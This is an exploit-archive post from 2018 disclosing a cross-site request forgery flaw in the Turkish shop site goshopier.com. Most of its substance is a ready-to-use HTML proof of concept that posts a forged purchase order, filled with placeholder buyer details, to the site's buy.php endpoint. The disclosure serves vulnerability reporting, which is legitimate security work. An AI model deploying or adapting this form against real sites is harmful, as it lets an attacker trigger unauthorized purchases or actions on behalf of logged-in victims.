Turkey/shopier CSRF Poc in goshopier.com

2018.04.16
tr 90 (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

author:Yusuf Furkan exploit title;Turkey/shopier CSRF Poc in goshopier.com twitter:R3DC0D3R1 Hi My name is Yusuf Furkan My csrf Poc in goshopier.com Poc; <html> <!-- CSRF PoC - generated by Yusuf --> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.goshopier.com/ShowProduct/buy.php" method="POST"> <input type="hidden" name="name" value="sdasasa" /> <input type="hidden" name="surname" value="saasasdsad" /> <input type="hidden" name="tckn" value="15786352" /> <input type="hidden" name="address" value="japonya&#32;tokyo" /> <input type="hidden" name="postcode" value="" /> <input type="hidden" name="city" value="BalÄ&#177;kesir" /> <input type="hidden" name="phone" value="&#40;555&#41;&#32;555&#32;&#45;&#32;52552115" /> <input type="hidden" name="email" value="testcsrf&#64;gmail&#46;com" /> <input type="hidden" name="note" value="" /> <input type="hidden" name="productid" value="52971" /> <input type="hidden" name="productcount" value="1" /> <input type="hidden" name="opt1" value="" /> <input type="hidden" name="opt2" value="" /> <input type="hidden" name="opt3" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Location:Turkey Note:Burdan Tüm dostlara selamlar :D

References:

Turkey web application Researcher


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top